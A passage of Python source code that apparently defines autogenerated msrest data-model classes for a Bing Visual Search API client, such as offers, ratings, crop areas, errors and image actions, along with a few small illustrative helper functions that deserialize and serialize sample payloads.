:vartype price_currency: str or ~visual_search_client.models.Currency
:ivar availability: The item's availability. The following are the possible values:
Discontinued, InStock, InStoreOnly, LimitedAvailability, OnlineOnly, OutOfStock, PreOrder,
SoldOut. Possible values include: "Discontinued", "InStock", "InStoreOnly",
"LimitedAvailability", "OnlineOnly", "OutOfStock", "PreOrder", "SoldOut".
:vartype availability: str or ~visual_search_client.models.ItemAvailability
:ivar aggregate_rating: An aggregated rating that indicates how well the product has been rated
by others.
:vartype aggregate_rating: ~visual_search_client.models.AggregateRating
:ivar last_updated: The last date that the offer was updated. The date is in the form YYYY-MM-
DD.
:vartype last_updated: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'seller': {'readonly': True},
'price': {'readonly': True},
'price_currency': {'readonly': True},
'availability': {'readonly': True},
'aggregate_rating': {'readonly': True},
'last_updated': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'seller': {'key': 'seller', 'type': 'Thing'},
'price': {'key': 'price', 'type': 'float'},
'price_currency': {'key': 'priceCurrency', 'type': 'str'},
'availability': {'key': 'availability', 'type': 'str'},
'aggregate_rating': {'key': 'aggregateRating', 'type': 'AggregateRating'},
'last_updated': {'key': 'lastUpdated', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Offer, self).__init__(**kwargs)
self.seller = None
self.price = None
self.price_currency = None
self.availability = None
self.aggregate_rating = None
self.last_updated = None
class AggregateOffer(Offer):
"""Defines a list of offers from merchants that are related to the image.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar seller: Seller for this offer.
:vartype seller: ~visual_search_client.models.Thing
:ivar price: The item's price.
:vartype price: float
:ivar price_currency: The monetary currency. For example, USD. Possible values include: "USD",
"CAD", "GBP", "EUR", "COP", "JPY", "CNY", "AUD", "INR", "AED", "AFN", "ALL", "AMD", "ANG",
"AOA", "ARS", "AWG", "AZN", "BAM", "BBD", "BDT", "BGN", "BHD", "BIF", "BMD", "BND", "BOB",
"BOV", "BRL", "BSD", "BTN", "BWP", "BYR", "BZD", "CDF", "CHE", "CHF", "CHW", "CLF", "CLP",
"COU", "CRC", "CUC", "CUP", "CVE", "CZK", "DJF", "DKK", "DOP", "DZD", "EGP", "ERN", "ETB",
"FJD", "FKP", "GEL", "GHS", "GIP", "GMD", "GNF", "GTQ", "GYD", "HKD", "HNL", "HRK", "HTG",
"HUF", "IDR", "ILS", "IQD", "IRR", "ISK", "JMD", "JOD", "KES", "KGS", "KHR", "KMF", "KPW",
"KRW", "KWD", "KYD", "KZT", "LAK", "LBP", "LKR", "LRD", "LSL", "LYD", "MAD", "MDL", "MGA",
"MKD", "MMK", "MNT", "MOP", "MRO", "MUR", "MVR", "MWK", "MXN", "MXV", "MYR", "MZN", "NAD",
"NGN", "NIO", "NOK", "NPR", "NZD", "OMR", "PAB", "PEN", "PGK", "PHP", "PKR", "PLN", "PYG",
"QAR", "RON", "RSD", "RUB", "RWF", "SAR", "SBD", "SCR", "SDG", "SEK", "SGD", "SHP", "SLL",
"SOS", "SRD", "SSP", "STD", "SYP", "SZL", "THB", "TJS", "TMT", "TND", "TOP", "TRY", "TTD",
"TWD", "TZS", "UAH", "UGX", "UYU", "UZS", "VEF", "VND", "VUV", "WST", "XAF", "XCD", "XOF",
"XPF", "YER", "ZAR", "ZMW".
:vartype price_currency: str or ~visual_search_client.models.Currency
:ivar availability: The item's availability. The following are the possible values:
Discontinued, InStock, InStoreOnly, LimitedAvailability, OnlineOnly, OutOfStock, PreOrder,
SoldOut. Possible values include: "Discontinued", "InStock", "InStoreOnly",
"LimitedAvailability", "OnlineOnly", "OutOfStock", "PreOrder", "SoldOut".
:vartype availability: str or ~visual_search_client.models.ItemAvailability
:ivar aggregate_rating: An aggregated rating that indicates how well the product has been rated
by others.
:vartype aggregate_rating: ~visual_search_client.models.AggregateRating
:ivar last_updated: The last date that the offer was updated. The date is in the form YYYY-MM-DD.
:vartype last_updated: str
:ivar offers: A list of offers from merchants that have offerings related to the image.
:vartype offers: list[~visual_search_client.models.Offer]
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'seller': {'readonly': True},
'price': {'readonly': True},
'price_currency': {'readonly': True},
'availability': {'readonly': True},
'aggregate_rating': {'readonly': True},
'last_updated': {'readonly': True},
'offers': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'seller': {'key': 'seller', 'type': 'Thing'},
'price': {'key': 'price', 'type': 'float'},
'price_currency': {'key': 'priceCurrency', 'type': 'str'},
'availability': {'key': 'availability', 'type': 'str'},
'aggregate_rating': {'key': 'aggregateRating', 'type': 'AggregateRating'},
'last_updated': {'key': 'lastUpdated', 'type': 'str'},
'offers': {'key': 'offers', 'type': '[Offer]'},
}
def __init__(
self,
**kwargs
):
super(AggregateOffer, self).__init__(**kwargs)
self.offers = None
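# --- Illustrative sketch (not part of the generated client) -----------------
# Rehydrating an AggregateOffer from a dict shaped like the service's JSON.
# msrest's Model.deserialize maps the camelCase wire keys through
# _attribute_map, and read-only fields are populated on receive (they are
# only skipped when sending). The payload below is fabricated for the example.
def _example_aggregate_offer():
    wire = {
        'name': 'Apple pie',
        'offers': [
            {'name': 'Bakery A', 'price': 9.99, 'priceCurrency': 'USD'},
            {'name': 'Bakery B', 'price': 12.50, 'priceCurrency': 'USD'},
        ],
    }
    aggregate = AggregateOffer.deserialize(wire)
    return [(offer.name, offer.price) for offer in aggregate.offers]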
class PropertiesItem(msrest.serialization.Model):
"""Defines an item.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: Rating.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param type: Required. Constant filled by server.
:type type: str
"""
_validation = {
'text': {'readonly': True},
'type': {'required': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
}
_subtype_map = {
'type': {'Rating': 'Rating'}
}
def __init__(
self,
**kwargs
):
super(PropertiesItem, self).__init__(**kwargs)
self.text = None
self.type = None # type: Optional[str]
class Rating(PropertiesItem):
"""Defines a rating.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: AggregateRating.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param type: Required. Constant filled by server.
:type type: str
:param rating_value: Required. The mean (average) rating. The possible values are 1.0 through
5.0.
:type rating_value: float
:ivar best_rating: The highest rated review. The possible values are 1.0 through 5.0.
:vartype best_rating: float
"""
_validation = {
'text': {'readonly': True},
'type': {'required': True},
'rating_value': {'required': True},
'best_rating': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'rating_value': {'key': 'ratingValue', 'type': 'float'},
'best_rating': {'key': 'bestRating', 'type': 'float'},
}
_subtype_map = {
'type': {'AggregateRating': 'AggregateRating'}
}
def __init__(
self,
**kwargs
):
super(Rating, self).__init__(**kwargs)
self.type = 'Rating' # type: str
self.rating_value = kwargs['rating_value']
self.best_rating = None
class AggregateRating(Rating):
"""Defines the metrics that indicate how well an item was rated by others.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar text: Text representation of an item.
:vartype text: str
:param type: Required. Constant filled by server.
:type type: str
:param rating_value: Required. The mean (average) rating. The possible values are 1.0 through
5.0.
:type rating_value: float
:ivar best_rating: The highest rated review. The possible values are 1.0 through 5.0.
:vartype best_rating: float
:ivar review_count: The number of times the recipe has been rated or reviewed.
:vartype review_count: int
"""
_validation = {
'text': {'readonly': True},
'type': {'required': True},
'rating_value': {'required': True},
'best_rating': {'readonly': True},
'review_count': {'readonly': True},
}
_attribute_map = {
'text': {'key': 'text', 'type': 'str'},
'type': {'key': '_type', 'type': 'str'},
'rating_value': {'key': 'ratingValue', 'type': 'float'},
'best_rating': {'key': 'bestRating', 'type': 'float'},
'review_count': {'key': 'reviewCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(AggregateRating, self).__init__(**kwargs)
self.type = 'AggregateRating' # type: str
self.review_count = None
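# Illustrative sketch (not part of the generated client): PropertiesItem and
# Rating each declare a _subtype_map, so deserializing through the base class
# should resolve the concrete subclass named by the '_type' discriminator.
# The payload is fabricated for the example.
def _example_polymorphic_rating():
    wire = {'_type': 'AggregateRating', 'ratingValue': 4.5, 'reviewCount': 120}
    item = PropertiesItem.deserialize(wire)
    assert isinstance(item, AggregateRating)
    return item.rating_value, item.review_count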
class CropArea(msrest.serialization.Model):
"""A JSON object consisting of coordinates specifying the four corners of a cropped rectangle within the input image.
All required parameters must be populated in order to send to Azure.
:param top: Required. The top coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's height and is measured from the top edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type top: float
:param bottom: Required. The bottom coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's height and is measured from the top edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type bottom: float
:param left: Required. The left coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's width and is measured from the left edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type left: float
:param right: Required. The right coordinate of the region to be cropped. The coordinate is a
fractional value of the original image's width and is measured from the left edge of the image.
Specify the coordinate as a value from 0.0 through 1.0.
:type right: float
"""
_validation = {
'top': {'required': True},
'bottom': {'required': True},
'left': {'required': True},
'right': {'required': True},
}
_attribute_map = {
'top': {'key': 'top', 'type': 'float'},
'bottom': {'key': 'bottom', 'type': 'float'},
'left': {'key': 'left', 'type': 'float'},
'right': {'key': 'right', 'type': 'float'},
}
def __init__(
self,
**kwargs
):
super(CropArea, self).__init__(**kwargs)
self.top = kwargs['top']
self.bottom = kwargs['bottom']
self.left = kwargs['left']
self.right = kwargs['right']
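# Illustrative sketch (not part of the generated client): all four CropArea
# coordinates are required, so omitting one raises a KeyError in __init__.
# serialize() emits the wire keys from _attribute_map. Values are made up.
def _example_crop_area():
    area = CropArea(top=0.1, bottom=0.9, left=0.1, right=0.9)
    return area.serialize()  # {'top': 0.1, 'bottom': 0.9, 'left': 0.1, 'right': 0.9}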
class Error(msrest.serialization.Model):
"""Defines the error that occurred.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param code: Required. The error code that identifies the category of error. Possible values
include: "None", "ServerError", "InvalidRequest", "RateLimitExceeded", "InvalidAuthorization",
"InsufficientAuthorization". Default value: "None".
:type code: str or ~visual_search_client.models.ErrorCode
:ivar sub_code: The error code that further helps to identify the error. Possible values
include: "UnexpectedError", "ResourceError", "NotImplemented", "ParameterMissing",
"ParameterInvalidValue", "HttpNotAllowed", "Blocked", "AuthorizationMissing",
"AuthorizationRedundancy", "AuthorizationDisabled", "AuthorizationExpired".
:vartype sub_code: str or ~visual_search_client.models.ErrorSubCode
:param message: Required. A description of the error.
:type message: str
:ivar more_details: A description that provides additional information about the error.
:vartype more_details: str
:ivar parameter: The parameter in the request that caused the error.
:vartype parameter: str
:ivar value: The parameter's value in the request that was not valid.
:vartype value: str
"""
_validation = {
'code': {'required': True},
'sub_code': {'readonly': True},
'message': {'required': True},
'more_details': {'readonly': True},
'parameter': {'readonly': True},
'value': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'sub_code': {'key': 'subCode', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'more_details': {'key': 'moreDetails', 'type': 'str'},
'parameter': {'key': 'parameter', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Error, self).__init__(**kwargs)
self.code = kwargs.get('code', "None")
self.sub_code = None
self.message = kwargs['message']
self.more_details = None
self.parameter = None
self.value = None
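# Illustrative sketch (not part of the generated client): 'message' is
# required (KeyError if omitted) while 'code' falls back to the default
# "None" string; the read-only fields (sub_code, parameter, ...) are
# dropped by serialize().
def _example_error():
    err = Error(message='Parameter "q" is missing.', code='InvalidRequest')
    return err.serialize()  # {'code': 'InvalidRequest', 'message': 'Parameter "q" is missing.'}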
class ErrorResponse(Response):
"""The top-level response that represents a failed request.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:param errors: Required. A list of errors that describe the reasons why the request failed.
:type errors: list[~visual_search_client.models.Error]
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'errors': {'required': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[Error]'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.errors = kwargs['errors']
class Filters(msrest.serialization.Model):
"""A key-value object consisting of filters that may be specified to limit the results returned by the API. Current available filters: site.
:param site: The URL of the site to return similar images and similar products from. (e.g.,
"www.bing.com", "bing.com").
:type site: str
"""
_attribute_map = {
'site': {'key': 'site', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Filters, self).__init__(**kwargs)
self.site = kwargs.get('site', None)
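# Illustrative sketch (not part of the generated client): restricting results
# to a single site. The serialized form is what would travel inside the
# knowledge request body; the site value is made up for the example.
def _example_filters():
    return Filters(site='www.bing.com').serialize()  # {'site': 'www.bing.com'}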
class ImageAction(Action):
"""Defines an image action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ImageAction, self).__init__(**kwargs)
self.action_type = None
class ImageEntityAction(ImageAction):
"""Defines an entity action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ImageEntityAction, self).__init__(**kwargs)
class ImageInfo(msrest.serialization.Model):
"""A JSON object that identities the image to get insights of . It also includes the optional crop area that you use to identify the region of interest in the image.
:param image_insights_token: An image insights token. To get the insights token, call one of
the Image Search APIs (for example, /images/search). In the search results, the `Image
<https://docs.microsoft.com/en-us/bing/bing-visual-search/overview>`_ object's
`imageInsightsToken <https://docs.microsoft.com/en-us/bing/bing-visual-search/overview>`_ field
contains the token. The imageInsightsToken and url fields are mutually exclusive; do not specify
both. Do not specify an insights token if the request includes the image form data.
:type image_insights_token: str
:param url: The URL of the input image. The imageInsightsToken and url fields are mutually
exclusive; do not specify both. Do not specify the URL if the request includes the image form
data.
:type url: str
:param crop_area: A JSON object consisting of coordinates specifying the four corners of a
cropped rectangle within the input image. Use the crop area to identify the region of interest
in the image. You can apply the crop area to the images specified using the imageInsightsToken
or url fields, or an image binary specified in an image form data.
:type crop_area: ~visual_search_client.models.CropArea
"""
_attribute_map = {
'image_insights_token': {'key': 'imageInsightsToken', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'crop_area': {'key': 'cropArea', 'type': 'CropArea'},
}
def __init__(
self,
**kwargs
):
super(ImageInfo, self).__init__(**kwargs)
self.image_insights_token = kwargs.get('image_insights_token', None)
self.url = kwargs.get('url', None)
self.crop_area = kwargs.get('crop_area', None)
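# Illustrative sketch (not part of the generated client): identifying the
# input image by URL plus a centre crop. Per the docstring, url and
# image_insights_token are mutually exclusive, so only one is set here.
# The URL is made up for the example.
def _example_image_info():
    info = ImageInfo(
        url='https://example.com/photo.jpg',
        crop_area=CropArea(top=0.25, bottom=0.75, left=0.25, right=0.75),
    )
    return info.serialize()  # {'url': ..., 'cropArea': {'top': 0.25, ...}}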
class ImageKnowledge(Response):
"""Defines a visual search API response.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar tags: A list of visual search tags.
:vartype tags: list[~visual_search_client.models.ImageTag]
:ivar image: Image object containing metadata about the requested image.
:vartype image: ~visual_search_client.models.ImageObject
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'tags': {'readonly': True},
'image': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'tags': {'key': 'tags', 'type': '[ImageTag]'},
'image': {'key': 'image', 'type': 'ImageObject'},
}
def __init__(
self,
**kwargs
):
super(ImageKnowledge, self).__init__(**kwargs)
self.tags = None
self.image = None
class ImageModuleAction(ImageAction):
"""Defines an image list action.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar result: The result produced in the action.
:vartype result: list[~visual_search_client.models.Thing]
:ivar display_name: A display name for the action.
:vartype display_name: str
:ivar is_top_action: A Boolean representing whether this result is the top action.
:vartype is_top_action: bool
:ivar service_url: Use this URL to get additional data to determine how to take the appropriate
action. For example, the serviceUrl might return JSON along with an image URL.
:vartype service_url: str
:ivar action_type: A string representing the type of action.
:vartype action_type: str
:ivar data: A list of images.
:vartype data: ~visual_search_client.models.ImagesModule
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'result': {'readonly': True},
'display_name': {'readonly': True},
'is_top_action': {'readonly': True},
'service_url': {'readonly': True},
'action_type': {'readonly': True},
'data': {'readonly': True},
}
_attribute_map = {
'type': {'key': '_type', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'read_link': {'key': 'readLink', 'type': 'str'},
'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'image': {'key': 'image', 'type': 'ImageObject'},
'description': {'key': 'description', 'type': 'str'},
'alternate_name': {'key': 'alternateName', 'type': 'str'},
'bing_id': {'key': 'bingId', 'type': 'str'},
'thumbnail_url': {'key': 'thumbnailUrl', 'type': 'str'},
'provider': {'key': 'provider', 'type': '[Thing]'},
'date_published': {'key': 'datePublished', 'type': 'str'},
'text': {'key': 'text', 'type': 'str'},
'result': {'key': 'result', 'type': '[Thing]'},
'display_name': {'key': 'displayName', 'type': 'str'},
'is_top_action': {'key': 'isTopAction', 'type': 'bool'},
'service_url': {'key': 'serviceUrl', 'type': 'str'},
'action_type': {'key': 'actionType', 'type': 'str'},
'data': {'key': 'data', 'type': 'ImagesModule'},
}
def __init__(
self,
**kwargs
):
super(ImageModuleAction, self).__init__(**kwargs)
self.data = None
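# Illustrative sketch (not part of the generated client): pulling the source
# URLs of the images carried by an ImageModuleAction (for example, a
# visually-similar-images action taken from a tag). 'action' is assumed to
# be such an instance from a deserialized response.
def _example_module_image_urls(action):
    if action.data is None or action.data.value is None:
        return []
    return [img.content_url for img in action.data.value]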
class MediaObject(CreativeWork):
"""Defines a media object.
Variables are only populated by the server, and will be ignored when sending a request.
:param type:
:type type: str
:ivar id: A String identifier.
:vartype id: str
:ivar read_link: The URL that returns this resource. To use the URL, append query parameters as
appropriate and include the Ocp-Apim-Subscription-Key header.
:vartype read_link: str
:ivar web_search_url: The URL to Bing's search result for this item.
:vartype web_search_url: str
:ivar name: The name of the thing represented by this object.
:vartype name: str
:ivar url: The URL to get more information about the thing represented by this object.
:vartype url: str
:ivar image: An image of the item.
:vartype image: ~visual_search_client.models.ImageObject
:ivar description: A short description of the item.
:vartype description: str
:ivar alternate_name: An alias for the item.
:vartype alternate_name: str
:ivar bing_id: An ID that uniquely identifies this item.
:vartype bing_id: str
:ivar thumbnail_url: The URL to a thumbnail of the item.
:vartype thumbnail_url: str
:ivar provider: The source of the creative work.
:vartype provider: list[~visual_search_client.models.Thing]
:ivar date_published: The date on which the CreativeWork was published.
:vartype date_published: str
:ivar text: Text content of this creative work.
:vartype text: str
:ivar content_url: Original URL to retrieve the source (file) for the media object (e.g., the
source URL for the image).
:vartype content_url: str
:ivar host_page_url: URL of the page that hosts the media object.
:vartype host_page_url: str
:ivar content_size: Size of the media object content. Use format "value unit" (e.g., "1024 B").
:vartype content_size: str
:ivar encoding_format: Encoding format (e.g., png, gif, jpeg, etc).
:vartype encoding_format: str
:ivar host_page_display_url: Display URL of the page that hosts the media object.
:vartype host_page_display_url: str
:ivar width: The width of the media object, in pixels.
:vartype width: int
:ivar height: The height of the media object, in pixels.
:vartype height: int
"""
_validation = {
'id': {'readonly': True},
'read_link': {'readonly': True},
'web_search_url': {'readonly': True},
'name': {'readonly': True},
'url': {'readonly': True},
'image': {'readonly': True},
'description': {'readonly': True},
'alternate_name': {'readonly': True},
'bing_id': {'readonly': True},
'thumbnail_url': {'readonly': True},
'provider': {'readonly': True},
'date_published': {'readonly': True},
'text': {'readonly': True},
'content_url': {'readonly': True},
'host_page_url': {'readonly': True},
